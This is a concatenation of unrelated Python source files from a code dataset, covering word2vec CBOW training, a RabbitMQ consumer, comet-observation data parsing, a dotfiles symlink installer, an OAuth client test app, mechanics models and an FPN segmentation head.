print(ind)
print(win)
def train_cbow(learnRate=1.0, num_sampled = 64, train_steps = 100001, window_size = 1):
batch_size = 128
embedding_size = 128 # Dimension of the embedding vector.
# We pick a random validation set to sample nearest neighbors. here we limit the
# validation samples to the words that have a low numeric ID, which by
# construction are also the most frequent.
valid_size = 16 # Random set of words to evaluate similarity on.
valid_window = 100 # Only pick dev samples in the head of the distribution.
valid_examples = np.array(random.sample(range(valid_window), valid_size))
# Number of negative examples to sample.
graph = tf.Graph()
with graph.as_default(): #, tf.device('/cpu:0'):
# Input data.
train_dataset = tf.placeholder(tf.int32, shape=[batch_size * window_size * 2])
train_labels = tf.placeholder(tf.int32, shape=[batch_size, 1])
valid_dataset = tf.constant(valid_examples, dtype=tf.int32)
# Variables.
embeddings = tf.Variable(
tf.random_uniform([vocabulary_size, embedding_size], -1.0, 1.0))
softmax_weights = tf.Variable(
tf.truncated_normal([vocabulary_size, embedding_size],
stddev=1.0 / math.sqrt(embedding_size)))
softmax_biases = tf.Variable(tf.zeros([vocabulary_size]))
# Model.
# Look up embeddings for inputs.
embed = tf.nn.embedding_lookup(embeddings, train_dataset)
embed = tf.reduce_sum(tf.reshape(embed, (batch_size, window_size * 2, embedding_size)), 1)
# Compute the softmax loss, using a sample of the negative labels each time.
loss = tf.reduce_mean(
tf.nn.sampled_softmax_loss(weights=softmax_weights, biases=softmax_biases, inputs=embed,
labels=train_labels, num_sampled=num_sampled, num_classes=vocabulary_size))
# Optimizer.
# Note: The optimizer will optimize the softmax_weights AND the embeddings.
# This is because the embeddings are defined as a variable quantity and the
# optimizer's `minimize` method will by default modify all variable quantities
# that contribute to the tensor it is passed.
# See docs on `tf.train.Optimizer.minimize()` for more details.
optimizer = tf.train.AdagradOptimizer(learning_rate=learnRate).minimize(loss)
# Compute the similarity between minibatch examples and all embeddings.
# We use the cosine distance:
norm = tf.sqrt(tf.reduce_sum(tf.square(embeddings), 1, keep_dims=True))
normalized_embeddings = embeddings / norm
valid_embeddings = tf.nn.embedding_lookup(
normalized_embeddings, valid_dataset)
similarity = tf.matmul(valid_embeddings, tf.transpose(normalized_embeddings))
with tf.Session(graph=graph) as session:
tf.global_variables_initializer().run()
batchGen = BatchGenerator(data, window_size)
print('Initialized')
average_loss = 0
for step in range(train_steps):
batch_labels, batch_data = batchGen(batch_size)
feed_dict = {train_dataset : batch_data, train_labels : batch_labels}
_, l = session.run([optimizer, loss], feed_dict=feed_dict)
average_loss += l
if step % 2000 == 0:
if step > 0:
average_loss = average_loss / 2000
# The average loss is an estimate of the loss over the last 2000 batches.
print('Average loss at step %d: %f' % (step, average_loss))
average_loss = 0
# note that this is expensive (~20% slowdown if computed every 500 steps)
if step % 10000 == 0:
sim = similarity.eval()
for i in range(valid_size):
valid_word = reverse_dictionary[valid_examples[i]]
top_k = 8 # number of nearest neighbors
nearest = (-sim[i, :]).argsort()[1:top_k+1]
log = 'Nearest to %s:' % valid_word
for k in range(top_k):
close_word = reverse_dictionary[nearest[k]]
log = '%s %s,' % (log, close_word)
print(log)
final_embeddings = normalized_embeddings.eval()
return final_embeddings
if __name__ == '__main__':
#test_batch()
train_cbow()
#train_skipgram(learnRate=0.1)
#train_skipgram(num_sampled=128) | StarcoderdataPython |
3224207 | <filename>python/chapter-7/shovel_consumer.py
###############################################
# RabbitMQ in Action
# Chapter 5 - Shovel Test Consumer
#
# Requires: pika >= 0.9.5
#
# Author: <NAME>
# (C)2011
###############################################
import json
import sys
import pika
def msg_rcvd(channel, method, header, body):
message = json.loads(body)
#/(ctc.1) Print & acknowledge our order
print("Received order %(ordernum)d for %(type)s." % message)
channel.basic_ack(delivery_tag=method.delivery_tag)
if __name__ == "__main__":
#/(ctc.2) Broker settings
AMQP_SERVER = sys.argv[1]
AMQP_PORT = int(sys.argv[2])
#/(ctc.3) Establish broker connection settings
creds_broker = pika.PlainCredentials("guest", "guest")
conn_params = pika.ConnectionParameters( AMQP_SERVER,
port=AMQP_PORT,
virtual_host="/",
credentials=creds_broker)
#/(ctc.5) Establish connection to RabbitMQ
conn_broker = pika.BlockingConnection(conn_params)
channel = conn_broker.channel()
#/(ctc.8) Start processing orders
print("Ready for orders!")
channel.basic_consume( msg_rcvd,
queue="warehouse_carpinteria",
no_ack=False,
consumer_tag="order_processor")
channel.start_consuming()
| StarcoderdataPython |
1697356 | <filename>src/preprocessing.py
from input import *
# creating train, and dev set
train = df.loc[:900] # trainig set
dev = df.loc[901:] # development set to test overfitting
print(train.shape, dev.shape)
print(train.target.value_counts())
print(dev.target.value_counts())
# creating dependent and independent matrix of features
x = train.iloc[:, :-1]
y = train.iloc[:, -1]
print(x.shape, y.shape)
# create training and test sets
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(x,y, test_size = 0.25, random_state = 31) | StarcoderdataPython |
112087 | <filename>tests/test_matrix_props/test_is_square.py
"""Test is_square."""
import numpy as np
from toqito.matrix_props import is_square
def test_is_square():
"""Test that square matrix returns True."""
mat = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
np.testing.assert_equal(is_square(mat), True)
def test_is_not_square():
"""Test that non-square matrix returns False."""
mat = np.array([[1, 2, 3], [4, 5, 6]])
np.testing.assert_equal(is_square(mat), False)
def test_is_square_invalid():
"""Input must be a matrix."""
with np.testing.assert_raises(ValueError):
is_square(np.array([-1, 1]))
if __name__ == "__main__":
np.testing.run_module_suite()
| StarcoderdataPython |
72126 | """Module for interacting with the Comet Observations Database (COBS)."""
from io import StringIO
import re
from pathlib import Path
from appdirs import user_cache_dir
from astropy.time import Time
import mechanize
import numpy as np
import pandas as pd
from . import PACKAGEDIR, log
# Where to store COBS data?
CACHEDIR = Path(user_cache_dir("cometcurve"))
# Column numbers of COBS/ICQ data fields
ICQ_COLUMNS = {
'comet': (0, 11),
'date': (11, 21),
'fractional_day': (21, 24),
'method': (26, 27),
'upper_limit': (27, 28),
'magnitude': (28, 32),
'poor': (32, 33),
'aperture': (35, 40),
'instrument': (40, 41),
'observer': (75, 80),
'comments': (130, -1)
}
class CometObservations():
"""Class to interact with the Comet Observation Database (COBS).
Parameters
----------
data : `pandas.DataFrame`
DataFrame returned by `read_cobs()`.
"""
def __init__(self, data=None):
if data is None:
self.data = read_cobs()
else:
self.data = data
def get_observer_list(self):
"""Returns a string listing all observer names.
The names are sorted by number of observations.
"""
return ", ".join(self.data.observer_name.value_counts().keys())
def read_cobs(years=('2020'), comet=None, start=None, stop=None,
allowed_methods=('S', 'B', 'M', 'I', 'E', 'Z', 'V', 'O'),):
"""Returns a `CometObservations` instance containing the COBS database."""
if years == 'all':
years = tuple(range(2018, 2020))
# Read the data
data = []
for yr in np.atleast_1d(years):
try:
dfyr = _get_cache_dataframe(yr)
except FileNotFoundError:
dfyr = download_cobs(yr)
data.append(dfyr)
df = pd.concat(data)
# Remove bad lines defined as follows:
# * date i.e. year does not start with the character 1 or 2 (indicative of ill-formatted ICQ)
# * the magnitude is not missing (character "-")
# * the "poor" column is empty (note: this removes a small number of entries
# for comet 1965S1 where magnitude -10.0 overflows into the poor column).
# * the magnitude is not an upper limit (`df.upper_limit.isna()`)
# * did not use a convential method (cf. `allowed_methods`), i.e. a method
# that does not yield something similar to a V-band integrated magnitude.
bad_data_mask = (df.date.str[0].isin(["1","2"])
& df.poor.isna()
& df.upper_limit.isna())
if df.magnitude.dtype is not float:
bad_data_mask &= df.magnitude != '-'
if allowed_methods != 'all':
bad_data_mask &= df.method.isin(allowed_methods)
df = df[bad_data_mask]
df['time'] = pd.to_datetime(df.date, utc=True) + pd.to_timedelta(df.fractional_day, unit='D')
df['jd'] = Time(df.time).jd
df['magnitude'] = df.magnitude.astype(float)
df['aperture'] = df.aperture.astype(float)
df['visual'] = df.method.isin(('S', 'M', 'B'))
df['binocular'] = df.instrument == 'B'
df['poor'] = df.poor.astype(str) == ":"
df['observer_name'] = df.comments.str.split(pat="[,;]", expand=True)[0]
# Optional data filtering
mask = np.ones(len(df), dtype=bool)
if comet is not None:
mask &= df.comet == comet.replace(" ", "")
if start is not None:
mask &= df.time > start
if stop is not None:
mask &= df.time < stop
df = df[mask]
# Add a column detailing the number of observations by each observer
df_counts = df.observer.value_counts().reset_index()
df_counts.columns = ['observer', 'observations']
df = pd.merge(df, df_counts, on="observer")
return CometObservations(df)
def _parse_icq(fileobj):
"""Parse a International Comet Quarterly (ICQ) format file."""
df = pd.read_fwf(fileobj, colspecs=list(ICQ_COLUMNS.values()),
names=ICQ_COLUMNS.keys(), header=None)
return df
def _get_cache_filename(year=2020):
"""Returns the `Path` to the COBS data file for a given year."""
return CACHEDIR / f'cobs{year}.feather'
def _get_cache_dataframe(year=2020):
fn = _get_cache_filename(year)
if fn.exists():
log.info(f"Loading {fn}")
return pd.read_feather(fn)
else:
raise FileNotFoundError(f"File not found: {fn}")
def download_cobs(year=2020, update=False):
"""Download a year of COBS data and save it in the cache."""
URL = "https://cobs.si/analysis"
cache_fn = _get_cache_filename(year)
if cache_fn.exists() and not update:
raise IOError(f"Data for {year} has already been downloaded. "
"Use `update=True` to download again.")
log.info(f"Retrieving {year} data from {URL}")
br = mechanize.Browser()
br.set_handle_robots(False)
br.open(URL)
br.select_form(nr=0)
br.form['START_DATE'] = f'{year}/01/01 00:00'
br.form['END_DATE'] = f'{year}/12/31 00:00'
br.submit(id="getobs")
resp = None
for link in br.links():
match = re.compile('.*lightcurve_.*.dat').search(link.url)
if match:
log.info(f"Downloading {link.url}")
resp = br.follow_link(link)
break
if resp is None:
raise IOError(f"Could not download COBS data for {year}.")
# Parse the format and save to a feather cache file
df = _parse_icq(StringIO(resp.get_data().decode()))
cache_fn.parent.mkdir(exist_ok=True)
log.info(f"Saving data to {cache_fn}")
df.to_feather(cache_fn)
return df
| StarcoderdataPython |
1679362 | import json
from ansible.module_utils._text import to_bytes, to_text
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
def update_list(a, *args, **kw):
data = {k:kw[k] for k in kw.keys() if k != 'index'}
for k in data:
a[kw['index']][k] = data[k]
return a
class FilterModule(object):
def filters(self):
return {
'update_list': update_list
}
| StarcoderdataPython |
1719367 | #!/usr/bin/env python3
import os, sys, shutil, configparser
if os.name == "nt":
import _winapi
home = os.environ["HOMEDRIVE"] + os.environ["HOMEPATH"]
else:
home = os.environ["HOME"]
def confirm(question, default="y"):
default = default.lower()
if default == "y":
options = "Y/n"
else:
options = "y/N"
# TODO: make this a single character read (no endline)
choice = input("%s (%s)? " % (question, options))
choice = choice.lower()
if choice == "":
choice = default
if choice == "a":
always = True
return choice == "y"
def getboolean(config, section, option, default=False):
try:
return config.getboolean(section, option)
except configparser.NoSectionError:
return default
except configparser.NoOptionError:
return default
def recursive_symlink(path):
config = configparser.ConfigParser()
# read config first
for fn in os.listdir(path):
if fn.lower() == "dotfiles.cfg":
rel_path = os.path.normpath(os.path.join(path, fn))
config.read(rel_path)
for fn in os.listdir(path):
if fn == ".git":
continue
if fn.lower() == "dotfiles.cfg": # reserve filename for dotfiles config
continue
rel_path = os.path.normpath(os.path.join(path, fn))
# if getboolean(config, fn, "pull"): # pull repos before we recurse
# recursive_pull(path)
# recurse or link here?
if os.path.isdir(rel_path) and not getboolean(config, fn, "link"):
recursive_symlink(rel_path)
else:
link_path = os.path.join(home, rel_path)
print("link path: ", link_path)
if os.path.lexists(
link_path
): # and confirm("%s already exists. overwrite? " % link_path):
if os.path.isdir(link_path) and not os.path.islink(link_path):
print("rmtree ", link_path)
shutil.rmtree(link_path)
else:
print("os.remove ", link_path)
os.remove(link_path)
try:
os.makedirs(os.path.dirname(link_path))
except FileExistsError:
pass
print("%s <- %s" % (os.path.abspath(rel_path), link_path))
os.symlink(
os.path.abspath(rel_path),
link_path,
target_is_directory=os.path.isdir(link_path),
)
if __name__ == "__main__":
if not confirm(
"Warning: This program will create links, potentially "
+ "overwriting any dotfiles matching between your home directory and "
"this program's subdirectory 'files'. " + "Do you wish to continue",
"n",
):
sys.exit(1)
back = os.getcwd()
os.chdir("files")
recursive_symlink(os.path.join("."))
os.chdir(back)
| StarcoderdataPython |
14723 | <reponame>LuckysonKhaidem/ProjectAlpha
from abc import ABCMeta, abstractmethod
from typing import TypeVar, Generic, List
S = TypeVar('S')
R = TypeVar('R')
"""
.. module:: Operator
:platform: Unix, Windows
:synopsis: Templates for operators.
.. moduleauthor:: <NAME> <<EMAIL>>
"""
class Operator(Generic[S, R]):
""" Class representing operator """
__metaclass__ = ABCMeta
@abstractmethod
def execute(self, source: S) -> R:
pass
@abstractmethod
def get_name(self) -> str:
pass
class Mutation(Operator[S, S]):
""" Class representing mutation operator. """
__metaclass__ = ABCMeta
def __init__(self, probability: float):
if probability > 1.0:
raise Exception('The probability is greater than one: {}'.format(probability))
elif probability < 0.0:
raise Exception('The probability is lower than zero: {}'.format(probability))
self.probability = probability
@abstractmethod
def execute(self, source: S) -> R:
pass
@abstractmethod
def get_name(self) -> str:
pass
class Crossover(Operator[List[S], List[R]]):
""" Class representing crossover operator. """
__metaclass__ = ABCMeta
def __init__(self, probability: float):
if probability > 1.0:
raise Exception('The probability is greater than one: {}'.format(probability))
elif probability < 0.0:
raise Exception('The probability is lower than zero: {}'.format(probability))
self.probability = probability
@abstractmethod
def get_number_of_parents(self):
pass
@abstractmethod
def execute(self, source: S) -> R:
pass
@abstractmethod
def get_name(self) -> str:
pass
class Selection(Operator[S, R]):
""" Class representing selection operator. """
__metaclass__ = ABCMeta
def __init__(self):
pass
@abstractmethod
def execute(self, source: S) -> R:
pass
@abstractmethod
def get_name(self) -> str:
pass
| StarcoderdataPython |
39605 | from inspect import isawaitable
from sanic import Sanic
from sanic.response import redirect, json, text
from sanic.exceptions import SanicException
from sanic_plugin_toolkit import SanicPluginRealm
from sanic_oauthlib.client import oauthclient
def create_oauth(app):
realm = SanicPluginRealm(app)
try:
oauth = realm.register_plugin(oauthclient)
except ValueError as v:
_, oauth = v
return oauth
def create_remote(app, oauth=None):
if not oauth:
oauth = create_oauth(app)
remote = oauth.remote_app(
'dev',
consumer_key='dev',
consumer_secret='devsecret',
request_token_params={'realm': 'email'},
base_url='http://127.0.0.1:5001/api/',
request_token_url='http://127.0.0.1:5001/oauth/request_token',
access_token_method='GET',
access_token_url='http://127.0.0.1:5001/oauth/access_token',
authorize_url='http://127.0.0.1:5001/oauth/authorize'
)
return remote
def create_client(app, oauth=None, remote=None):
if not oauth:
oauth = create_oauth(app)
if not remote:
remote = create_remote(app, oauth)
session = {}
#TODO: make a better client session for test
@app.middleware
async def add_dummy_session(request):
context = oauth.context
shared_context = oauth.context.shared
shared_request_context = shared_context.request[id(request)]
shared_request_context['session'] = session
@app.route('/')
async def index(request):
if 'dev_oauth' in session:
ret = await remote.get('email')
if isinstance(ret.data, dict):
return json(ret.data)
return str(ret.data)
return redirect(app.url_for('login'))
@app.route('/login')
@remote.autoauthorize
async def login(request, context):
return {'callback': app.url_for('authorized', _external=True, _scheme='http')}
@app.route('/logout')
def logout(request):
session.pop('dev_oauth', None)
return redirect(app.url_for('index'))
@app.route('/authorized')
@remote.authorized_handler
async def authorized(request, data, context):
if data is None:
return 'Access denied: error=%s' % (
request.args['error']
)
resp = {k: v[0] for k, v in data.items()}
if 'oauth_token' in resp:
session['dev_oauth'] = resp
return json(resp)
return text(str(resp))
@app.route('/address')
async def address(request):
ret = await remote.get('address/hangzhou')
if ret.status not in (200, 201):
raise SanicException(ret.data, status_code=ret.status)
return text(ret.raw_data)
@app.route('/method/<name>')
async def method(request, name):
func = getattr(remote, name)
ret = func('method')
if isawaitable(ret):
ret = await ret
return text(ret.raw_data)
@remote.tokengetter
async def get_oauth_token():
if 'dev_oauth' in session:
resp = session['dev_oauth']
return resp['oauth_token'], resp['oauth_token_secret']
return remote
if __name__ == '__main__':
app = Sanic("test_main")
create_client(app)
app.run(host='localhost', port=8000, debug=True, auto_reload=False)
| StarcoderdataPython |
1636091 | import rppFile
import PySimpleGUI as sg
import os.path
from tryouts import mywindow
def printstruct(struct, indent):
print("%s%s children" % ((" " * indent), len(struct)))
for child in struct:
if isinstance(child, sg.Element):
print("%sElement %s %s" % ((" " * indent), child.tag, child.attrib))
gc = child.findall('*')
printstruct(gc, indent + 3)
else:
print("%s%s" % ((" " * indent), child))
file_list_column = [
[
sg.Text("Image Folder"),
sg.In(size=(25, 1), enable_events=True, key="-FOLDER-"),
sg.FolderBrowse(),
],
[
sg.Listbox(
values=[], enable_events=True, size=(40, 20), key="-FILE LIST-"
)
],
]
image_viewer_column = [
[sg.Text("Choose an image from list on left:")],
[sg.Text(size=(40, 1), key="-TOUT-")],
[sg.Image(key="-IMAGE-")],
]
layout = [
[
sg.Column(file_list_column),
sg.VSeperator(),
sg.Column(image_viewer_column),
]
]
def showComplexGUI():
window = sg.Window("Image Viewer", layout)
# Run the Event Loop
while True:
event, values = window.read()
if event == "Exit" or event == sg.WIN_CLOSED:
break
# Folder name was filled in, make a list of files in the folder
if event == "-FOLDER-":
folder = values["-FOLDER-"]
try:
# Get list of files in folder
file_list = os.listdir(folder)
except:
file_list = []
fnames = [
f
for f in file_list
if os.path.isfile(os.path.join(folder, f))
and f.lower().endswith((".png", ".gif"))
]
window["-FILE LIST-"].update(fnames)
elif event == "-FILE LIST-": # A file was chosen from the listbox
try:
filename = os.path.join(
values["-FOLDER-"], values["-FILE LIST-"][0]
)
window["-TOUT-"].update(filename)
window["-IMAGE-"].update(filename=filename)
except:
pass
window.close()
def showSimpleGUI():
sg.theme('DarkAmber') # Add a touch of color
# All the stuff inside your window.
layout = [[sg.Text('Some text on Row 1')],
[sg.Text('Enter something on Row 2'), sg.InputText()],
[sg.Button('Ok'), sg.Button('Cancel')]]
# Create the Window
window = sg.Window('Window Title', layout)
# Event Loop to process "events" and get the "values" of the inputs
while True:
event, values = window.read()
if event == sg.WIN_CLOSED or event == 'Cancel': # if user closes window or clicks cancel
break
print('You entered ', values[0])
window.close()
if __name__ == '__main__':
rppfile = rppFile.openFile('/home/roger/rpp/SW5.rpp')
children = rppfile.findall('*')
printstruct(children, 0)
mywindow.showMyWindow() | StarcoderdataPython |
158656 | <reponame>olivierverdier/odelab
from __future__ import division
import numpy as np
from . import NonHolonomic
class Robot(NonHolonomic):
def position(self,u):
return u[:4]
def velocity(self, u):
return u[4:8]
def lag(self,u):
return u[8:10]
def codistribution(self, u):
q2 = self.position(u)[2]
cod = np.zeros([2,4])
cod[0,0] = cod[1,1] = 1.
cod[0,3] = -np.cos(q2)
cod[1,3] = -np.sin(q2)
return cod
def force(self, u):
q = self.position(u)
f = np.zeros_like(q)
f[3] = -10*np.cos(q[3])
return f
def average_force(self, u0, u1):
q0 = self.position(u0)
t0 = q0[3]
t1 = self.position(u1)[3]
if np.allclose(t0,t1):
f = -10*np.cos(t0)
else:
f = -10*(np.sin(t1) - np.sin(t0))/(t1-t0) # check this!
fvec = np.zeros_like(q0)
fvec[3] = f
return fvec
def energy(self, u):
q3 = self.position(u)[3]
return .5*np.sum(self.momentum(u) * self.velocity(u), axis=0) + 10*np.sin(q3)
class VerticalRollingDisk(NonHolonomic):
"""
Vertical Rolling Disk
"""
size = 10 # 4+4+2
def __init__(self, mass=1., radius=1., Iflip=1., Irot=1.):
"""
:mass: mass of the disk
:radius: Radius of the disk
:Iflip: inertia momentum around the "flip" axis
:Irot: inertia momentum, around the axis of rotation symmetry of the disk (perpendicular to it)
"""
self.mass = mass
self.radius = radius
self.Iflip = Iflip
self.Irot = Irot
#def label(self, component):
#return ['x','y',u'φ',u'θ','vx','vy',u'ωφ',u'ωη',u'λ1',u'λ2'][component]
def position(self, u):
"""
Positions x,y,φ (SE(2) coordinates), θ (rotation)
"""
return u[:4]
def velocity(self, u):
return u[4:8]
def average_force(self, u0, u1):
return self.force(u0) # using the fact that the force is zero in this model
def lag(self,u):
return u[8:10]
def codistribution(self, u):
q = self.position(u)
phi = q[2]
R = self.radius
one = np.ones_like(phi)
zero = np.zeros_like(phi)
return np.array([[one, zero, zero, -R*np.cos(phi)],[zero, one, zero, -R*np.sin(phi)]])
def state(self,u):
return u[:8]
def force(self,u):
return np.zeros_like(self.position(u))
def qnorm(self, ut):
return np.sqrt(ut[0]**2 + ut[1]**2)
def energy(self, ut):
return .5*(self.mass*(ut[4]**2 + ut[5]**2) + self.Iflip*ut[6]**2 + self.Irot*ut[7]**2)
def exact(self,t,u0):
"""
Exact solution for initial condition u0 at times t
:param array(N) t: time points of size N
:param array(8+) u0: initial condition
:return: a 10xN matrix of the exact solution
"""
ohm_phi,ohm_theta = u0[6:8]
R = self.radius
rho = ohm_theta*R/ohm_phi
x_0,y_0,phi_0,theta_0 = u0[:4]
phi = ohm_phi*t+phi_0
one = np.ones_like(t)
m = self.mass
return np.vstack([rho*(np.sin(phi)-np.sin(phi_0)) + x_0,
-rho*(np.cos(phi)-np.cos(phi_0)) + y_0,
ohm_phi*t+phi_0,
ohm_theta*t+theta_0,
R*np.cos(phi)*ohm_theta,
R*np.sin(phi)*ohm_theta,
ohm_phi*one,
ohm_theta*one,
-m*ohm_phi*R*ohm_theta*np.sin(phi),
m*ohm_phi*R*ohm_theta*np.cos(phi),])
def initial(self, u00):
"""
Make sure that the constraints are fulfilled at the initial conditions.
"""
u0 = np.copy(u00)
phi = u0[2]
vtheta = u0[7]
u0[4] = np.cos(phi)*vtheta
u0[5] = np.sin(phi)*vtheta
return u0
| StarcoderdataPython |
3235278 | <gh_stars>0
from pkgutil import extend_path
from .client import APIClient
__path__ = extend_path(__path__, __name__)
__all__ = ['APIClient']
| StarcoderdataPython |
3377469 | <gh_stars>10-100
import collections
import numpy as np
import torch
import torch.nn as nn
from torch.nn import functional as F
from simnet.lib.net.models import simplenet
from simnet.lib.net.post_processing import segmentation_outputs, depth_outputs, pose_outputs, obb_outputs
MODEL_SEM_SEG_HEAD_IN_FEATURES = ['p2', 'p3', 'p4']
MODEL_POSE_HEAD_IN_FEATURES = ['p3', 'p4']
MODEL_SEM_SEG_HEAD_IGNORE_VALUE = 255
MODEL_SEM_SEG_HEAD_COMMON_STRIDE = 4
MODEL_POSE_HEAD_COMMON_STRIDE = 8
MODEL_SEM_SEG_HEAD_LOSS_WEIGHT = 1.0
def c2_msra_fill(module: nn.Module) -> None:
"""
Initialize `module.weight` using the "MSRAFill" implemented in Caffe2.
Also initializes `module.bias` to 0.
Args:
module (torch.nn.Module): module to initialize.
"""
nn.init.kaiming_normal_(module.weight, mode="fan_out", nonlinearity="relu")
if module.bias is not None:
# pyre-fixme[6]: Expected `Tensor` for 1st param but got `Union[nn.Module,
# torch.Tensor]`.
nn.init.constant_(module.bias, 0)
class Conv2d(torch.nn.Conv2d):
"""
A wrapper around :class:`torch.nn.Conv2d` to support empty inputs and more features.
"""
def __init__(self, *args, **kwargs):
"""
Extra keyword arguments supported in addition to those in `torch.nn.Conv2d`:
Args:
norm (nn.Module, optional): a normalization layer
activation (callable(Tensor) -> Tensor): a callable activation function
It assumes that norm layer is used before activation.
"""
norm = kwargs.pop("norm", None)
activation = kwargs.pop("activation", None)
super().__init__(*args, **kwargs)
self.norm = norm
self.activation = activation
def forward(self, x):
if x.numel() == 0 and self.training:
# https://github.com/pytorch/pytorch/issues/12013
assert not isinstance(
self.norm, torch.nn.SyncBatchNorm
), "SyncBatchNorm does not support empty inputs!"
if x.numel() == 0 and TORCH_VERSION <= (1, 4):
assert not isinstance(
self.norm, torch.nn.GroupNorm
), "GroupNorm does not support empty inputs in PyTorch <=1.4!"
# When input is empty, we want to return a empty tensor with "correct" shape,
# So that the following operations will not panic
# if they check for the shape of the tensor.
# This computes the height and width of the output tensor
output_shape = [(i + 2 * p - (di * (k - 1) + 1)) // s + 1 for i, p, di, k, s in
zip(x.shape[-2:], self.padding, self.dilation, self.kernel_size, self.stride)]
output_shape = [x.shape[0], self.weight.shape[0]] + output_shape
empty = _NewEmptyTensorOp.apply(x, output_shape)
if self.training:
# This is to make DDP happy.
# DDP expects all workers to have gradient w.r.t the same set of parameters.
_dummy = sum(x.view(-1)[0] for x in self.parameters()) * 0.0
return empty + _dummy
else:
return empty
x = super().forward(x)
if self.norm is not None:
x = self.norm(x)
if self.activation is not None:
x = self.activation(x)
return x
def get_norm(norm, out_channels):
"""
Args:
norm (str or callable): either one of BN, SyncBN, FrozenBN, GN;
or a callable that takes a channel number and returns
the normalization layer as a nn.Module.
Returns:
nn.Module or None: the normalization layer
"""
if out_channels == 32:
N = 16
else:
N = 32
if isinstance(norm, str):
if len(norm) == 0:
return None
norm = {
"BN": torch.nn.BatchNorm2d,
#"SyncBN": NaiveSyncBatchNorm,
#"FrozenBN": FrozenBatchNorm2d,
"GN": lambda channels: nn.GroupNorm(N, channels),
#"nnSyncBN": nn.SyncBatchNorm, # keep for debugging
}[norm]
return norm(out_channels)
class SemSegFPNHead(nn.Module):
"""
A semantic segmentation head described in detail in the Panoptic Feature Pyramid Networks paper
(https://arxiv.org/abs/1901.02446). It takes FPN features as input and merges information from
all levels of the FPN into single output.
"""
def __init__(self, input_shape, num_classes, model_norm='BN', num_filters_scale=4):
super().__init__()
MODEL_SEM_SEG_HEAD_NORM = model_norm
MODEL_SEM_SEG_HEAD_CONVS_DIM = 128 // num_filters_scale
self.in_features = MODEL_SEM_SEG_HEAD_IN_FEATURES
feature_strides = {k: v.stride for k, v in input_shape.items()}
feature_channels = {k: v.channels for k, v in input_shape.items()}
self_ignore_value = MODEL_SEM_SEG_HEAD_IGNORE_VALUE
conv_dims = MODEL_SEM_SEG_HEAD_CONVS_DIM
self.common_stride = MODEL_SEM_SEG_HEAD_COMMON_STRIDE
norm = MODEL_SEM_SEG_HEAD_NORM
self.bilinear_upsample = nn.Upsample(
scale_factor=self.common_stride, mode="bilinear", align_corners=False
)
self.scale_heads = []
for in_feature in self.in_features:
head_ops = []
head_length = max(1, int(np.log2(feature_strides[in_feature]) - np.log2(self.common_stride)))
for k in range(head_length):
norm_module = get_norm(norm, conv_dims)
conv = Conv2d(
feature_channels[in_feature] if k == 0 else conv_dims,
conv_dims,
kernel_size=3,
stride=1,
padding=1,
bias=not norm,
norm=norm_module,
activation=F.relu,
)
c2_msra_fill(conv)
head_ops.append(conv)
if feature_strides[in_feature] != self.common_stride:
head_ops.append(nn.Upsample(scale_factor=2, mode="bilinear", align_corners=False))
self.scale_heads.append(nn.Sequential(*head_ops))
self.add_module(in_feature, self.scale_heads[-1])
self.predictor = Conv2d(conv_dims, num_classes, kernel_size=1, stride=1, padding=0)
c2_msra_fill(self.predictor)
def forward(self, features, targets=None):
"""
Returns:
In training, returns (None, dict of losses)
In inference, returns (predictions, {})
"""
x = self.layers(features)
x = self.bilinear_upsample(x)
return x
def layers(self, features):
for i, f in enumerate(self.in_features):
if i == 0:
x = self.scale_heads[i](F.relu(features[f]))
else:
x = x - -self.scale_heads[i](F.relu(features[f]))
x = self.predictor(x)
return x
def losses(self, predictions, targets):
predictions = F.interpolate(
predictions, scale_factor=self.common_stride, mode="bilinear", align_corners=False
)
loss = F.cross_entropy(predictions, targets, reduction="mean", ignore_index=self.ignore_value)
return loss
class PoseFPNHead(nn.Module):
"""
A semantic segmentation head described in detail in the Panoptic Feature Pyramid Networks paper
(https://arxiv.org/abs/1901.02446). It takes FPN features as input and merges information from
all levels of the FPN into single output.
"""
def __init__(self, input_shape, num_classes, model_norm='BN', num_filters_scale=4):
super().__init__()
MODEL_SEM_SEG_HEAD_NORM = model_norm
MODEL_SEM_SEG_HEAD_CONVS_DIM = 128 // num_filters_scale
self.in_features = MODEL_POSE_HEAD_IN_FEATURES
feature_strides = {k: v.stride for k, v in input_shape.items()}
feature_channels = {k: v.channels for k, v in input_shape.items()}
self_ignore_value = MODEL_SEM_SEG_HEAD_IGNORE_VALUE
conv_dims = MODEL_SEM_SEG_HEAD_CONVS_DIM
self.common_stride = MODEL_POSE_HEAD_COMMON_STRIDE
norm = MODEL_SEM_SEG_HEAD_NORM
self.scale_heads = []
for in_feature in self.in_features:
head_ops = []
head_length = max(1, int(np.log2(feature_strides[in_feature]) - np.log2(self.common_stride)))
for k in range(head_length):
norm_module = get_norm(norm, conv_dims)
conv = Conv2d(
feature_channels[in_feature] if k == 0 else conv_dims,
conv_dims,
kernel_size=3,
stride=1,
padding=1,
bias=not norm,
norm=norm_module,
activation=F.relu,
)
c2_msra_fill(conv)
head_ops.append(conv)
if feature_strides[in_feature] != self.common_stride:
head_ops.append(nn.Upsample(scale_factor=2, mode="bilinear", align_corners=False))
self.scale_heads.append(nn.Sequential(*head_ops))
self.add_module(in_feature, self.scale_heads[-1])
self.predictor = Conv2d(conv_dims, num_classes, kernel_size=1, stride=1, padding=0)
c2_msra_fill(self.predictor)
def forward(self, features, targets=None):
"""
Returns:
In training, returns (None, dict of losses)
In inference, returns (predictions, {})
"""
x = self.layers(features)
return x
def layers(self, features):
for i, f in enumerate(self.in_features):
if i == 0:
x = self.scale_heads[i](F.relu(features[f]))
else:
x = x - -self.scale_heads[i](F.relu(features[f]))
x = self.predictor(x)
return x
class ShapeSpec(collections.namedtuple("_ShapeSpec", ["channels", "height", "width", "stride"])):
"""
A simple structure that contains basic shape specification about a tensor.
It is often used as the auxiliary inputs/outputs of models,
to obtain the shape inference ability among pytorch modules.
Attributes:
channels:
height:
width:
stride:
"""
def __new__(cls, *, channels=None, height=None, width=None, stride=None):
return super().__new__(cls, channels, height, width, stride)
def res_fpn(hparams):
return PanopticNet(hparams)
class DepthHead(nn.Module):
def __init__(self, backbone_output_shape_4x, backbone_output_shape_8x, hparams):
super().__init__()
self.head = SemSegFPNHead(
backbone_output_shape_4x,
num_classes=1,
model_norm=hparams.model_norm,
num_filters_scale=hparams.num_filters_scale
)
self.hparams = hparams
def forward(self, features):
depth_pred = self.head.forward(features)
